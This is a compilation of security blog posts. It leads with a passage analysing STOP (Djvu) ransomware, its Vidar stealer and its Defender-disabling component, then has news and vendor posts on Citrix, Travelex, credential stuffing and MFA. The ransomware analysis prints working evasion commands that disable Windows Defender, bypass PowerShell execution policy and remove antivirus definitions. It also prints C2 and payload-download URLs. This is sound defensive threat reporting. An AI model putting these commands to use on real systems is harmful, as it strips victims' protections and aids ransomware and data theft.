The main payload of STOP (djvu) has lots of anti-emulation and anti-debugging techniques implemented by its common wrapper, which is believed to be used for most of the payloads. Few of the ransomware are seen avoiding encryption for a particular set of countries, depending on the region of their origin and strength of victims to pay the ransom. For that, we have observed the use of keyboard layouts to identify the country of the victim system. Here, STOP authors did not rely on legacy techniques as there might be a chance of error. The payload checks for the location of the system by visiting “https[:]//api.2ip.ua/geo.json” where in response we get information about the location and timezone of the system.

In response to this request, details of location including longitude, latitude, timezone along with country and city are received.

Fig. 2: IP Response

The retrieved country code is compared with a few other country codes. If it matches with any of the listed country codes, the payload does not execute further. The image below shows the country code comparison before encryption.

Fig. 3: Country Code Comparison

Once it confirms that the victim is not from one of the enlisted countries, it creates a folder with UUID or GUID used as its name at directory “%AppData%\Local\”. After that, payload creates self-copy at this location and access controls of this file are changed using ‘icals’ by the following command:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

Where OI: Object Inherit, CI: Container Inherit, DE: Delete, DC: Delete Child

Again after this, payload runs itself from its original location by elevating access rights as admin using

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask 

Further, it terminates the parent process. Parameters confirm that the process is neither initiated by autostart programs nor it is a scheduled task and is running as admin. This newly executed process creates a task scheduler entry using TaskSchedulerCOM at:

C:\Windows\System32\Tasks\Time Trigger Task

Fig. 4: Time Trigger Task

Then it retrieves the MAC address of the system using GetAdaptersInfo(). An MD5 hash of this MAC address is then calculated using Windows Crypto APIs and is then used to uniquely identify the system. A request is sent to malicious CnC using this MD5 hash, which gets RSA-2048 public key and system encryption identifier i.e. personal ID as a response.

Request format:

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

This response is stored in %AppData%\Local\bowsakkdestx.txt. This key is further used in file encryption, which we will discuss later. Also, the ID received along with the public key is stored in C:\SystemID\PersonalID.txt for future reference.

While receiving personal ID and public key, the ransomware payload also downloads a couple of other malware from the CnC server. It consists of infamous info-stealer i.e. Vidar and a trojan payload which is similar to previously seen Vilsel.

Fig. 5: File Download Requests

In Fig.5, ‘5.exe’ was downloaded and it is one of the Vidar payloads, while ‘updatewin1.exe’ was Vilsel. The lateral activity of these components will be discussed later.

For persistence, along with time trigger task, it also creates one RUN registry entry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

It drops ransom note to the directories it has enumerated. Before start of encryption process, a mutex {1D6FC66E – D1F3 – 422C – 8A53 – C0BBCF3D900D} is created. This mutex is common throughout STOP-Djvu campaign.

It particularly checks for the presence of file I:\5d2860c89d774.jpg and if present, it encrypts this file.

File Encryption:

File encryption involves 2 types:

  • Encryption with Online Key
  • Encryption with Offline Key

In the first scenario, payload tries to establish a connection with CnC by sending a request for server-generated public key and ID using the associated MD5 hash of the system’s MAC address. The response is saved in bowsakkdestx.txt. For encryption, this key is used in the future.

In the latter type of encryption, if STOP ransomware is not able to get a response from the CnC, it checks for the existence of bowsakkdestx.txt at ‘%AppData%/Local’ directory. If the file found, it checks for the ‘Public Key’ keyword in the file. If the file does not contain a public key, payload deletes the file and again checks for the CnC response. On the other hand, if the file is not present then it uses public key and ID which are already present in the file. Most of the strings in the payload are present in encrypted form i.e. XORed with byte key 0x80. The recent payloads of stop have an offline ID which is appended by its extension name and “t1”.

ex: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

Few file types and directories are skipped from the encryption process based on path and file extensions.

Extensions excluded:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Along with above extensions, the extension used by payload to indicate encryption is also avoided.

Files Excluded:

ntuser.dat  ntuser.dat.LOG1  ntuser.dat.LOG2  ntuser.pol  _readme.txt

Folders in Windows directory and browser folders in the Program Files directory are excluded from encryption.

Before encryption, it also checks for file encryption marker i.e. “{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}” which is at the end of the file followed by encryption ID.

While encrypting a file, it keeps the first 5 bytes of the file as it is. The rest of the file data is encrypted with the Salsa20 algorithm. For the file data encryption, UUID is created and is used as a key for the Salsa20 algorithm. In this way, each file uses a new UUID and the unique key is used for encryption of each file. Given below is an example of one Salsa20 key.

Fig. 6: Salsa20 Key

After encryption of file data, the UUID used as Salsa20 key is also encrypted with the RSA-2048 public key which was received from the CnC server. In the case of offline encryption, this key is retrieved from the payload itself. The encrypted UUID is appended after encrypted file data. The personal ID which was again received from the server with RSA-2048 public key is appended to encrypted UUID. If files are encrypted offline, then this personal ID is also retrieved from file and is common for all offline infected victims. At the end of the file, encryption marker ‘{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}’ is written.

Fig. 7: File Encryption Structure

 

Lateral Activity:

     1. Vidar (5.exe)

Vidar is a known info-stealer trojan, which collects sensitive information from your system and then delivers it to its CnC. The information it may steal includes:

  • Browser Login Data, History, Cookies
  • Browser Cache
  • System Information
  • Messaging/Email software data
  • Two-factor authentication software data

It checks for the presence of various browsers and software including two-factor authentication tools.

Fig. 8: Vidar File Access

It stores stolen data in a randomly named folder in the ProgramData directory. In this directory, few ‘.zip’ files are created which contain files like information.txt which has details of user and machine, running processes and software installed in the system. The retrieved passwords/credentials from browsers and other software are stored in passwords.txt. The rest of the information is stored in directories/files with respective software names.

Fig. 9: Vidar File Write

There is one file additional named ID which contains data in the form of SQL database having tables like logins, meta, stats, sync_entities_metadata and sync_model_metadata. These tables mainly have browser-related data of the user. All of these data are then sent to CnC of Vidar which is hxxp://crarepo[.]com/ in this case. Changes in the CnC servers are observed over the period.

Fig. 10: Vidar HttpSendRequestA

     2. Updatewin1.exe:

This component is mainly used to hide ransomware’s existence or evade detection based on the behavior of malware. It shows similarity with the Vilsel Trojan family.

First of all, it executes itself with elevated privileges. This process with elevated privileges executes PowerShell with the following command line, to change execution policy from default restricted to RemoteSigned, which results in the execution of local policies without any digital signature.

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

The updatewin1.exe then drops script.ps1 having command ‘Set-MpPreference -DisableRealtimeMonitoring $true’ at %temp% location. A new PowerShell instance is initiated with parameters:

 -NoProfile -ExecutionPolicy Bypass -Command “& {Start-Process PowerShell -ArgumentList ‘-NoProfile -ExecutionPolicy Bypass -File %AppData%\Local\script.ps1″”‘ -Verb RunAs.

This runs PowerShell with admin privileges and bypasses all execution policies for the current instance of PowerShell. This executes script.ps1 resulting in disabling of Windows Realtime Protection. It also removes downloaded updates/signatures of windows defender using the command:

mpcmdrun.exe -removedefinitions -all

The task manager is also disabled by changing the registry and then updatewin1.exe deletes itself using a batch file.

     3. Updatewin.exe:

This component has no suspicious or malicious activity. It just displays windows update prompt so that any of the suspicious activities will be considered as windows update changes. There is no minimize or close option to this window, one has to kill the process to get rid of it.

Fig. 12: Fake Update Window

 

Ransom note:

Fig. 13: _readme.txt Ransom note

Over the campaign, the STOP ransom note has remained the same with few small changes. It asks for $980 of ransom and gives a 50% discount if payment is done within 3 days. The conversation with victims is carried over the mail. Ransom note contains the Personal Id of the user which is also stored in C:\SystemID\PersonalID.txt.

Statistics:

Fig. 14: Statistics

From the introduction of the new RSA 2048 variant, we have seen a noticeable increase in infections. As the chart above states, there was a gradual increase from August till November with hits crossing 120,000 mark. However, there’s been a decrease in hits in December, which seems to have continued in the month of January.

Conclusion:

From the start of the STOP-djvu campaign, stop authors have focused on changing payloads and extensions within short intervals, making their presence among ransomware strong and sound. Initially, authors believed in symmetric cryptography, hoping for ransom from most of the cases with newer payloads and unique keys for each variant. The free decryptors for offline infections forced them to shift to asymmetric cryptography, which made the decryption of new infections harder. Also, propagating through multiple crack software, activators, keygen software and fake software/OS upgrades, has been an effective way of spreading for this ransomware.

IOCs:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

 URLs:

hxxp://ring2[.]ug/files/penelop/3.exe

hxxp://ring2[.]ug/files/penelop/4.exe

hxxp://ring2[.]ug/files/penelop/5.exe

hxxp://ring2[.]ug/files/penelop/updatewin.exe

hxxp://ring2[.]ug/files/penelop/updatewin1.exe

hxxp://ring2[.]ug/files/penelop/updatewin2.exe

hxxp://crarepo[.]com/

The post STOP (Djvu) Ransomware: Ransom For Your Shady Habits! appeared first on Seqrite Blog.

Companies increasingly reporting attacks attributed to foreign governments

More than one in four security managers attribute attacks against their organization to cyberwarfare or nation-state activity, according to Radware. Nation-state intrusions soaring In 2018, 19% of organizations believed they were attacked by a nation-state. That figure increased to 27% in 2019. Companies in North America were more likely to report nation-state attribution, at 36%. “Nation-state intrusions are among the most difficult attacks to thwart because the agencies responsible often have significant resources, knowledge of … More

The post Companies increasingly reporting attacks attributed to foreign governments appeared first on Help Net Security.

Cyber attackers turn to business disruption as primary attack objective

Over the course of 2019, 36% of the incidents that CrowdStrike investigated were most often caused by ransomware, destructive malware or denial of service attacks, revealing that business disruption was often the main attack objective of cybercriminals. Another notable finding in the new CrowdStrike Services Report shows a large increase in dwell time to an average of 95 days in 2019 — up from 85 days in 2018 — meaning that adversaries were able to … More

The post Cyber attackers turn to business disruption as primary attack objective appeared first on Help Net Security.

Budgetary, policy, workforce issues influencing DOD and intelligence community IT priorities

Information Technology spending by Department of Defense (DOD) and Intelligence Community (IC) agencies will continue to grow as they work to keep pace with the evolution of both the threat landscape and technology development, according to Deltek. Intelligence community The increasing sophistication of adversaries, expanding threat landscape, rapid pace of technology advancement and data proliferation continue to fuel the IC’s demand for tools and resources to meet mission objectives. IT solutions such as cloud computing, … More

The post Budgetary, policy, workforce issues influencing DOD and intelligence community IT priorities appeared first on Help Net Security.

Rethinking cyber scenarios—learning (and training) as you defend

In two recent posts I discussed with Circadence the increasing importance of gamification for cybersecurity learning and how to get started as a practitioner while being supported by an enterprise learning officer or security team lead. In this third and final post in the series, Keenan and I address more advanced SecOps scenarios that an experienced practitioner would be concerned with understanding. We even show how Circadence and Microsoft help seasoned practitioners defend against some of the most prevalent and advanced attackers we see across industries.

Here are more of Keenan’s insights from our Q&A:

Q: Keenan, thanks for sharing in this digital conversation with me again. I admire your passion for gamified cyber learning. I’d not put the two ideas together, that you can adopt gaming concepts—and consoles—in a way that makes learning the often difficult and evolving subject matter of “cyber” much more fun and impactful. Now that I’ve used Project Ares for a year, it’s hard to imagine NOT having an interactive, gamified platform to help me build and refine cybersecurity concepts and skills. Several friends and colleagues have also registered their teenagers for Circadence’s Project Ares Academy subscriptions to kickstart their learning journey toward a cyber career path. If kids are going to game, let’s point them to something that will build employable skills for the future.

In our last two blogs, we introduced readers to a couple of new ideas:

Now, let’s pivot and focus on practical cyber scenarios (let’s say Tier 1 or Tier 2 defender scenarios)—situations that would likely be directed to experienced cyber professionals to handle. Walk us through some of detail about how Circadence has built SecOps gaming experiences into Project Ares through mission scenarios that are inspired by real cyber incidents pulled from news headlines incorporating today’s most common attack methods such as ransomware, credential theft, and even nation-state attacks?

A: Sure. I’ll start with descriptions of a couple of our foundational missions.

Scenario one: Ransomware—Project Ares offers several mission scenarios that address the cyber kill chain around ransomware. The one I’ll focus on is Mission 10, Operation Crimson Wolf. Acting as a cyber force member working for a transportation company, the user must secure networks so the company can conduct effective port activity. However, the company is in danger as ransomware has encrypted data and a hacker has launched a phishing attack on the network, impacting how and when operators offload ships. The player must stop the ransomware from spreading and attacking other nodes on the network before it’s too late. I love this scenario because 1) it’s realistic, 2) ransomware attacks occur far too often, and 3) it allows the player to engage in a virtual environment to build skills.

Users who engage in this mission learn core competencies like:

  • Computer network defense.
  • Incident response management.
  • Data forensics and handling.

We map all our missions to the NIST/NICE work role framework and Mission 10 touches on the following work roles: System Security Analyst, Cyber Defense Analyst, Cyber Defense Incident Responder, and the Cyber Defense Forensics Analyst.

Image from scenario one: Ransomware

Scenario two: Credential theft—Another mission that’s really engaging is Mission 1, Operation Goatherd. It teaches how credential theft can occur via a brute force attack. In this mission, the user must access the command and control server of a group of hackers to disable a botnet network in use. The botnet is designed to execute a widespread financial scam triggering the collapse of a national bank! The user must scan the command and control server located at myloot.com for running services, identify a vulnerable service, perform a brute force attack to obtain credentials, and then kill the web server acting as the command and control orchestrator.

This scenario is powerful because it asks the player to address the challenge by thinking from an adversary’s perspective. It helps the learner understand how an attacker would execute credential theft (though there are many ways) and gives the learner a different perspective for a well-rounded comprehension of the attack method.

Users who engage in this mission learn core competencies like:

  • Network protocols.
  • Reconnaissance and enumeration.
  • Password cracking and exploration.

The NIST/NICE work role aligned to this mission is a Cyber Operator. Specific tasks this work role must address include:

  • Analyzing target operational architecture for ways to gain access.
  • Conducting network scouting and vulnerability analysis of systems within a network.
  • Detecting exploits against targeted networks.

Image from scenario two: Credential theft

Q: Can you discuss how Project Ares’ learning curriculum addresses critical threats from advanced state or state-backed attackers. While we won’t name governments directly, the point for our readers to understand is that the national and international cybersecurity stage is built around identifying and learning how to combat the tools, tactics, and procedures that threat actors are using in all industries.

A: Here’s a good example.

Scenario three: Election security—In this mission, we deploy in our next release of Project Ares, which now leverages cloud native architecture (running on Microsoft Azure), is Mission 15, Operation Raging Mammoth. It helps a cyber professional protect against an election attack—something we are all too familiar with through recent headlines about election security. As an election security official, the user must monitor voting systems to establish a baseline of normal activity and configurations from which we identify anomalies. The user must detect and report changes to an administrator’s access permissions and/or modifications to voter information.

The NIST/NICE work roles aligned to this mission include professionals training as a Cyber Defense Analyst, Cyber Defense Incident Responder, or Threat/Warning Analyst.

Image from scenario three: Election security

I’ve reviewed some of the specific cyber scenarios a Tier 1 or Tier 2 defender might experience on the job. Now I’d like to share a bit how we build these exercises for our customers.

It really comes down to the professional experiences and detailed research from our Mission and Battle Room design teams at Circadence. Many of them have explicit and long-standing professional experience as on-the-job cyber operators and defenders, as well as cyber professors and teachers at renowned institutions. They really understand what professionals need to learn, how they need to learn, and the most effective ways to learn.

We profile Circadence professionals in the Living Our Mission Blog Series to help interested readers understand the skill and dedication of the people behind Project Ares. By sharing the individual faces behind the solution, we hope current and prospective customers will appreciate Project Ares more knowing that Circadence is building the most relevant learning experiences available to support immersive, gamified learning of today’s cyber professionals.

Learn more

To see Project Ares “in action” visit Circadence and request a demonstration, or speak with your local Microsoft representative. You can also try your hand at it by attending an upcoming Microsoft Ignite: The Tour event, which features a joint Microsoft/Circadence “Into the Breach” capture the flag exercise.

To learn more about how to close the cybersecurity talent gap, read the e-book: CISO essentials: How to optimize recruiting while strengthening cybersecurity. For more information on Microsoft intelligence security solutions, including guidance on Zero Trust, visit Reach the optimal state in your Zero Trust journey.

The post Rethinking cyber scenarios—learning (and training) as you defend appeared first on Microsoft Security.

How does Artificial Intelligence boost the power of cybersecurity?

Estimated reading time: 2 minutes

An artificial intelligence (AI) revolution is brewing in cybersecurity. A recent market report pegged the global artificial intelligence (AI) in the cybersecurity market to be worth USD 7.1 billion in 2018 and expected to reach approximately USD 30.9 billion by 2025, at a CAGR of around 23.4%.

There is a sea of change in cybersecurity attack patterns with enterprises turning to new technology and approaches to stay ahead of these threats. Thanks to the increasing volume and velocity of modern-day threats, enterprises are rapidly moving towards a threat detection and response approach— this is where artificial intelligence can greatly help.

Through AI-based solutions, enterprises will be able to improve threat intelligence, protection and detection at a much faster rate than before. AI will enable this by reducing the requirement of having specialized cybersecurity experts within the enterprise – a factor which will be welcomed by an industry which faces a rapid skill shortage in this domain.

An easier way to deal with data overload

Currently, there’s an overload of data for information security teams to deal with. The data is both structured and unstructured; analyzing it is a manual and repetitive task. Teams spend inordinate amounts of time on analyzing all this data manually — the risk for error is high and the time is also not spent productively.

Through machine learning and deep learning techniques, data analysis can be left to artificial intelligence, leaving cybersecurity employees to more productively use their time. By analysis and tracking millions of data from various sources, an AI system can be trained to better understand cybersecurity threats.

The power of automation

In the last couple of years, there have been fears raised over whether artificial intelligence will take over jobs, leaving humans redundant. It is natural to have such concerns leading to pushback against the implementation of AI in a workforce. However, when it comes to cybersecurity, AI and its resultant tools like machine learning and automation will actually augment a workforce.

Automation, for example, will mitigate repeatable tasks and operate them at a pace far greater than an average human being ever can, providing faster and better results. The benefit for cybersecurity teams is twofold – fatigue is reduced and time is spent on finding better ways to secure an enterprise.

Speeding up incident response through Artificial Intelligence

According to the latest study by Ponemon, the global average time to identify and contain a data breach is a whopping 279 days. Enterprises are aware that with the magnitude of threats around them, the incident response has become a key priority and artificial intelligence can be a key ally in this case.

AI can detect threats or suspicious activity on a real-time analysis sending actionable intelligence for incident response in a matter of seconds. By tapping into the power of artificial intelligence, enterprises will see a faster response to threats, enabling better security and intelligence.

Drive a more efficient organization

Cumulatively, the benefits of AI in cybersecurity add up to create a more efficient organization. With a better and more rigorous analysis of both unstructured and structured data along with continuous assessments of new threats, an enterprise’s cybersecurity framework is far more solid and defined. In the long run, AI-powered enterprises will be more efficient and have greater productivity.

Seqrite understands the need for enterprises to integrate AI into their cybersecurity efforts. GoDeep.AI, Seqrite’s proprietary Artificial Intelligence capability is now embedded in most of the inventory, offering a Cloud-based Deep Learning Module, Advanced Behavior Detection System and other powerful features to provide a unique AI-based cybersecurity solution.

The post How does Artificial Intelligence boost the power of cybersecurity? appeared first on Seqrite Blog.

Hackers check Citrix servers for weakness in remote code execution

At least eighty thousand organisations could be at risk.

Cyber attackers scan Citrix servers, which are vulnerable to a critical ADC and Gateway security vulnerability, as researchers have warned. 

Disclosed in December, the Citrix Application Delivery Controller (ADC), previously known as NetScaler ADC, has a serious vulnerability monitored under CVE-2019-19781 next to the Citrix Gateway formerly identified as the NetScaler Gateway. The crucial flaw, originally reported by Positive Technologies Mikhail Klyuchnikov, facilitates directory cross-cutters and allows threatening actors to execute remote code execution (RCE) attacks if used. 

These products are affected according to a Citrix security advisory:

  • All supported Citrix ADC and Citrix Gateway 13.0 builds versions 
  • 12.1 Citrix ADC and NetScaler Gateway all supported Citrix ADC 
  • NetScaler Gateway 12.0, Citrix ADC
  • NetScaler Gateway versions 11.1 all supported Citrix Citrix NetScaler ADC
  • NetScaler Gateway 10.5 builds all supported builds

Researchers estimated that, in 158 countries, at least 80,000 organizations are ADC users and could thus be at risk. The shooting corporations are mainly based in the US – about 38% – as well as the United Kingdom, Germany, the Netherlands and Australia.

“Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP),” Positive Technologies says. “In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked. This vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company’s internal network from the Citrix server.”

Cybersecurity researchers have detected an incidence of Citrix server scans potentially vulnerable to the bug as reported by Bleeping Computer.

Researcher Kevin Beaumont said on Twitter that one of his honeypots had leaked

“attackers reading sensitive credential config files remotely using ../ directory traversal (a variant of this issue).”

No public exploit code appears to be widely used— at least not yet. In his own honeypot checks, SANS Technology Institute Dean of Research Johannes Ullrich noted that the current scans seem in no sense “developed”–some of which are only GET requests–but added that “other sources I believe to be credible have shown that they can produce a code execution exploit.” A patch is not yet released but Citrix has released it. The organization advises that IT administrators use a series of instructions, which can be found here, to adjust reaction policies.

“Citrix strongly urges affected customers to immediately apply the provided mitigation. Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released,” Citrix says

In March of last year, in a password spraying method, Citrix revealed a security violation caused by weak account credentials.

The post Hackers check Citrix servers for weakness in remote code execution appeared first on .

How credential stuffing attacks use weak passwords to compromise accounts?

Estimated reading time: 2 minutes

In November 2019, over 2000 users of NordVPN, a service offering Virtual Private Networks (VPNs,) saw their accounts being compromised. It was an example of credential stuffing, a type of cyberattack that takes advantage of human frailty regarding passwords to take over accounts.

Credential stuffing may seem similar to data breaches and brute force attacks but there are various points of difference. In the case of a data breach, much of the data that is stolen from an organization comprises user names and passwords. The people who steal this data often sell it on the dark web for inordinate amounts of money.

The weakest link is weak passwords

Attackers obtain these credentials from different sources and take advantage of the fact that most individuals do not change their user names or passwords across websites. In fact, most people use the same (credentials) almost on every website.

Hackers use automated credential stuffing software to stuff websites using these credentials. The rate of success is extremely low (0.1-0.2%) but when an attacker has access to more than a billion credentials, even such a low rate of success can enable them to get successful matches for 1,000 accounts.

The rest is easy and also scary to guess – once inside these accounts, attackers can use them at their disposal. They can do unauthorized transactions, send malware to other accounts and basically create havoc. Credential stuffing attacks are getting more and more prevalent – big names like Nest, Uber, Superdrug and even Dunkin’ Donuts have recently had to deal with credential stuffing attacks.

The importance of maintaining strong credentials

Preventing credential stuffing attacks is only possible by following an age-old cybersecurity strategy: strong passwords. Enterprises at risk of credential stuffing attacks need to keep on reiterating the importance of maintaining strong passwords along with other good cybersecurity habits to all their employees and partners across the supply chain.

Some of the key messages that need to be reinforced are:

Don’t use the same credentials across different websites

Employees don’t like remembering passwords so they create one strong password and use it everywhere. It’s a big no-no and as credential stuffing attacks demonstrate, if attacks can gain access to a password through one site, it’s quite probable that they’ll be able to gain access to all other services you use (including financial information).

Enforce and popularize multi-factor authentication

Multi-factor authentication is the best defence against credential stuffing attacks. With an additional layer of security being provided and users required to put in a mandatory validation every time, it helps reduce the dependency on passwords. While it may be difficult for enterprises to implement an organization-wide multi-factor authentication policy, it should be used in as many places as possible.

Train employees to use strong, complex passwords

Security is a habit, rather than a process. Enterprises need to ensure they have a cybersecurity first mindset and the way to cultivate that is by continuously training and reminding employees about the importance of creating strong, dynamic passwords. This should be done at an onboarding stage and continuously in the employee lifecycle.

Blacklist suspicious IPs

Security teams should always be scanning the data and identify where threats to their enterprises originate from. It’s a good practice to blacklist any suspicious IPs that keep cropping up regularly to lessen the chances of a cyberattack.

Seqrite Endpoint Security helps enterprises prevent credential stuffing and other dangerous cyberattacks through its top-of-the-line protection solutions, integrating advanced technologies like Anti Ransomware, Advanced DNA Scan and Behavioral Detection System.

The post How credential stuffing attacks use weak passwords to compromise accounts? appeared first on Seqrite Blog.

Currency Exchange Company Travelex Hit By Ransomware Attack

Currency exchange giant Travelex has effectively been taken offline by a ransomware attack. 

The attack was first detected the night of December 31. Soon after, the company took its systems offline. A week later, Travelex is processing transactions with pen and paper at its 1,200 branches located in more than 70 countries. 

“To date, the company can confirm that whilst there has been some data encryption, there is no evidence that structured personal customer data has been encrypted. Whist Travelex does not yet have a complete picture of all the data that has been encrypted, there is still no evidence to date that any data has been exfiltrated,” the company said in a public statement.

The hackers claim to have six months’ worth of sensitive customer data containing birthdates, credit card information, and insurance numbers. They have threatened to sell the information if their $6 million ransom isn’t delivered.

 “The deadline for doubling the payment is two days. Then another seven days and the sale of the entire base,” the hackers were quoted as saying to BBC news

The ransomware detected on the Travelex servers has been identified as Sodinokibi (also known as REvil), a “ransomware as a service” form of malware that is developed and maintained by the Sodinokibi hacking group and deployed by over 40 affiliates. This strain of ransomware was used in many of 2019’s most newsworthy ransomware campaigns, including concurrent attacks on 22 Texas municipalities.

Researchers believe the hackers took advantage of an unpatched critical vulnerability on the company’s VPN servers. Travelex had neglected to address these vulnerabilities for eight months after they were brought to the company’s attention.

The post Currency Exchange Company Travelex Hit By Ransomware Attack appeared first on Adam Levin.

Changing the monolith—Part 1: Building alliances for a secure culture

Any modern security expert can tell you that we’re light years away from the old days when firewalls and antivirus were the only mechanisms of protection against cyberattacks. Cybersecurity has been one of the hot topics of boardroom conversation for the last eight years, and has been rapidly increasing to higher priority due to the size and frequency of data breaches that have been reported across all industries and organizations.

The security conversation has finally been elevated out of the shadows of the IT Department and has moved into the executive and board level spotlights. This has motivated the C-teams of organizations everywhere to start asking hard questions of their Chief Information Officers, Chief Compliance Officers, Privacy Officers, Risk Organizations, and Legal Counsels.

Cybersecurity professionals can either wait until these questions land at their feet, or they can take charge and build relationships with executives and the business side of the organization.

Taking charge of the issue

Professionals fortunate enough to have direct access to the Board of Directors of their organization can also build extremely valuable relationships at the board level as well. As cybersecurity professionals establish lines of communication throughout organizational leadership, they must keep in mind that these leaders, although experts in their respective areas, are not technologists.

The challenge that cybersecurity professionals face is being able to get the non-technical people on board with the culture of change in regards to security. These kinds of changes in culture and thinking can help facilitate the innovation that is needed to decrease the risk of compromise, reputation damage, sanctions against the organization, and potential stock devaluation. So how can one deliver this message of Fear, Uncertainty, and Doubt (FUD) without losing the executive leaders in the technical details or dramatization of the current situation?

Start by addressing the business problem, not the technology.

The answer isn’t as daunting as you might think

The best way to start the conversation with business leaders is to begin by stating the principles of your approach to addressing the problem and the risks of not properly addressing it. It’s important to remember to present the principles and methods in a way that is understandable to non-technical persons.

This may sound challenging at first, but the following examples will give you a good starting point of how to accomplish this:

  • At some point in time, there will be a data breach—Every day we’re up against tens of thousands of “militarized” state-sponsored threat actors who usually know more about organizations and technical infrastructure than we do. This is not a fight we’ll always win, even if we’re able to bring near unlimited resources to the table, which is often rare itself. In any scenario, we must accept some modicum of risk, and cybersecurity is no different. The approach for resolution should involve mitigating the likelihood and severity of a compromise situation when it ultimately does occur.
  • Physical security and cybersecurity are linked—If you have access to physical hardware, there are a myriad of ways to pull data directly from your enterprise network and send it to a dark web repository or other malicious data repository for later decryption and analysis. If you have possession of a laptop or mobile device, and storage encryption hasn’t been implemented, an attacker can forensically image the device fairly easily and make an exact replica to analyze later. By using these or similar examples, you can clearly state that physical security even equals cybersecurity in many cases.
  • You can’t always put a dollar amount on digital trust—Collateral damage in the aftermath of a cyberattack go well beyond dollars and paying attention to cybersecurity and privacy threats demonstrate digital trust to clients, customers, employees, suppliers, vendors, and the general public. Digital trust underpins every digital interaction by measuring and quantifying the expectation that an entity is who or what it claims to be and that it will behave in an expected manner. This can set an organization apart from its competitors.
  • Everything can’t be protected equally; likewise, everything doesn’t have the same business value—Where are the crown jewels and what systems’ failure would create a critical impact on the organizations business? Once identified, the organization has a lot less to worry about and protect. Additionally, one of the core principles should be, “When in doubt, throw it out.” Keeping data longer than it needs to be kept increases the attack surface area and creates liability for the firm to produce large amounts of data during requests for legal discovery. The Data Retention Policy needs to reflect this. Data Retention Policies need to be created with input from the business and General Counsel.
  • Identity is the new perimeter—Additional perimeter-based security appliances will not decrease the chance of compromise. Once identity is compromised, perimeter controls become useless. Operate as if the organization’s network has already been compromised as mentioned in principle #1. Focus the investment on modern authentication, Zero Trust, conditional access, and abnormal user and information behavior detection. Questions to ask now include, what’s happening to users, company data, and devices both inside and outside the firewall. Think about data handling—who has access to what and why and is it within normal business activity parameters?

The culture of change in the organization

If leadership is not on board with the people, process, and technology changes required to fulfill a modern approach to cybersecurity and data protection, any effort put into such a program is a waste of time and money.

You can tell immediately if you’ve done the appropriate amount of marketing to bring cybersecurity and data protection to the forefront of business leaders’ agendas. If the funding and the support for the mission is unavailable, one must ask oneself if the patient, in this case the organization, truly wants to get better.

If, during a company meeting, a CEO declares that “data protection is everyone’s responsibility, including mine,” everyone will recognize the importance of the initiative to the company’s success. Hearing this from the CISO or below does not have the same gravitas.

The most successful programs I’ve seen are those who have been sponsored at the highest levels of the organization and tied to performance. For more information on presenting to the board of directors, watch our CISO Spotlight Episode with Bret Arsenault, Microsoft CISO.

Stayed tuned and stay updated

Stay tuned for “Changing the monolith—Part 2” where I address who you should recruit as you build alliances across the organization, how to build support through business conversations, and what’s next in driving organizational change. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the monolith—Part 1: Building alliances for a secure culture appeared first on Microsoft Security.

Why should enterprises invest in Multifactor Authentication?

Estimated reading time: 2 minutes

Most users of Google’s services are familiar with the fact that the technology giant asks for a user’s recovery phone number as an additional layer of protection for authentication. Although have you really wondered if this additional layer is truly effective?

Google did a study and got definite answers — partnering with researchers from New York University and the University of California, San Diego, Google studied how effective their security measures were. The results showed that by only adding a recovery phone number to a Google account blocked up to 100% of automated bots, 99% of bulk phishing and 66% of targeted attacks.

The difference an additional layer of protection makes

The aforementioned is a perfect example of how adding an additional layer of authentication, can be scaled up to bolster enterprise cybersecurity.

Commonly known as Multifactor Authentication, the concept per se is simple — instead of providing a single instance of authentication for system access (i.e. a password), a user is required to submit two or more instances. These( instances) revolve around the following principles –

  • Unique information specific to the user
  • Exclusive device possessed solely by the user

For a more real-world example of Multifactor Authentication, consider withdrawing money through an ATM. A user can only withdraw money if they possess two items, a bank card and a PIN. Another example is logging in to a financial website – users must authenticate themselves using both their unique password along with their One Time Pin (OTP) which is generated at the time of log-in.

Global authentication

Multifactor Authentication provides an additional layer of security to user data making it very difficult for cybercriminals to penetrate an enterprise network. The Payment Card Industry Security Council’s Data Security Standards (PCI DSS) mandates Multifactor Authentication for certain types of card transactions while all electronic payments in the European Economic Zone require strong customer authentication as mandated by a directive from the European Union.

While it has been established that the biggest advantage of Multifactor Authentication is enhanced security, there are other advantages as well such as –

Damage Limitation

Thanks to Multifactor Authentication, the damage of a lost phone or a successful impersonation by an attacker can be mitigated. Multifactor Authentication means an attacker will be unable to access the data they want, giving IT teams more time to remedy the issue.

Better Productivity & Security

Multifactor Authentication enables enterprises to allow employees to be more flexible regarding using their own devices for work-related purposes. This can drive productivity and help overall efficiency.

Immediate Notifications

Multifactor Authentication can detect immediately if there has been a security breach (i.e. multiple incorrect OTPs being inputted) and can deliver immediate notifications to network administrators for rectification of the problem.

Prevent Data Breaches

Data breaches can prove costly; according to a recent study, the average total cost was $3.92 million. Multifactor Authentication can help prevent data breaches leading to substantial cost savings for the enterprise.

Recognizing its importance, Seqrite offers Multifactor Authentication across its products and services. The Endpoint Security solution offered by Seqrite evaluates and mitigates risks associated with any fraudulent transactions.

The post Why should enterprises invest in Multifactor Authentication? appeared first on Seqrite Blog.

